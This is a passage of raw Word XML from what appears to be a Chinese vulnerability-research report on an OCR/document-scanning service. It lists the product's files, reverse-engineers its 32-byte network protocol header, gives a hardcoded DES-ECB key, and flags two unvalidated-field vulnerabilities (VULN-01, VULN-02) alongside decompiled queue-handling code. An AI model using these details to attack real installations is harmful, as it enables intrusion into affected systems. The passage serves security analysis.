            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="366DE533">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2290A6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F8C90D0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TCrypto32.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A7A2F71">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="029914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33AB5D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>DocTraverser64.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BFBD006">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文档扫描库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710EBE90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5DA5207B">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="升级备份文件"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级/备份文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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33"/>
        <w:gridCol w:w="4845"/>
      </w:tblGrid>
      <w:tr w14:paraId="1C6FE8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CC47020">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C096C7E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62D2A6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EB70B4B">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>Upgrade3.oau</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (540MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55339864">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>升级包</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（最大单文件）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="317289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FB8417">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>UpdateInfo.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68D31877">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28D245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54ED42">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>bakOCR*.dat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>bakTDMAIFrame.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5841608C">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OCR/AI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模型备份包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35DEDF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28DBDFD">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>unins000.exe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>unins000.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C46BE4B">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>卸载程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A4D685C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"/>
    <w:p w14:paraId="744704DF">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="运行时目录"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行时目录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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7"/>
        <w:gridCol w:w="7197"/>
      </w:tblGrid>
      <w:tr w14:paraId="172A22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0933199">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB43C28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3E1C51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C571077">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>DATA/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C41DB2">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行时数据（警告：服务运行中不可操作）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78A8BB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D5DC0B">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TRACE/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618599A4">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志/追踪文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B62F3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D97D99F">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>WebServer/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6922F6C4">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="225749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32CDEE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>InstallLog/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E3BE6A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34AFED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DF24412">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>debug/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04E9E60D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>调试信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="00E0E6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2950CE4">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>REPORT_LOG/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D74F446">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报告日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42CC83C6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bookmarkEnd w:id="8"/>
    <w:p w14:paraId="34E08A84">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="X13c9ebb9e9d01c4af97b152edebb8c228f3a815"/>
      <w:r>
        <w:t xml:space="preserve">2. OCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议结构（32字节头部）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B900F">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Offset  Size  Field        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>------  ----  -----------  ---------------------------</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0       2    Magic        0x4D4F (LE: 4F 4D)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2       2    Flags        bit0=1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit0=0: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>断开信号;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit14=0x4000: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DES-ECB加密</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4       2    Command      CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WORD，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x6010, 0x6460, 0x6700</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6       2    Version      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本（CMD_VERSION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时有特殊含义）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8       4    Field8       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未知</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">12       4    AgentID      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理ID（连接队列映射的键）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">16       4    CRC          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>校验（VULN-01使用）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">20       4    Size         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件大小（VULN-01）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">24       4    Offset       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件偏移（VULN-01：未验证范围）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">28       4    PayloadLen   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>载荷长度（VULN-02）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">32+      -    Payload      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令特定数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4FEE64">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DES-ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>flags &amp; 0x4000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，头部字节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8–31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及载荷均以密钥</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>"ocularv3"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DES-ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加解密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058342F2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>语义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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75"/>
        <w:gridCol w:w="2271"/>
        <w:gridCol w:w="2271"/>
        <w:gridCol w:w="1416"/>
      </w:tblGrid>
      <w:tr w14:paraId="39F2C0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3B73719">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>flags &amp; 0x0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="5D6B3ECE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>sub_140E31820</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4871BCAE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>sub_140E31830</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA808FF">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>含义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="611345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812D9F2">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0 (bit0=0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="0DA43605">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>TRUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B307FD">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2164F0A9">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>断开信号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60ED37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1E31792">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>1 (bit0=1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="717E157C">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6AF35E">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>TRUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0328BF54">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正常数据包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CA6BE74">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3467100" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1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B3A98">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3848100" cy="927100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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92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  <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="23383667">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Xc391e9fc2e1b5baa698acf0f81c1b46aee5c95f"/>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接队列机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A9BAE">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="Xd58b6e884c5d6b9e06eac4ffbf5865e4d400fc0"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列插入（sub_140ADB3E0）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140ADB3E0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> context_value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:i/>
        </w:rPr>
        <w:t>// 以 header.AgentID 为键，存储 context_value（n4 值）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:i/>
        </w:rPr>
        <w:t>// 如：context_value=0 → 普通包；context_value=4 → 重传包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD28E3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2627630"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="3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27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11"/>
    <w:p w14:paraId="1CEC8C38">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="Xecf1fa4e38004665fadc1f1f74344faf8d01007"/>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列查找与出队（sub_140ADC0B0，TCP接收回调）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C8E2B">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140E31830</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>a4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
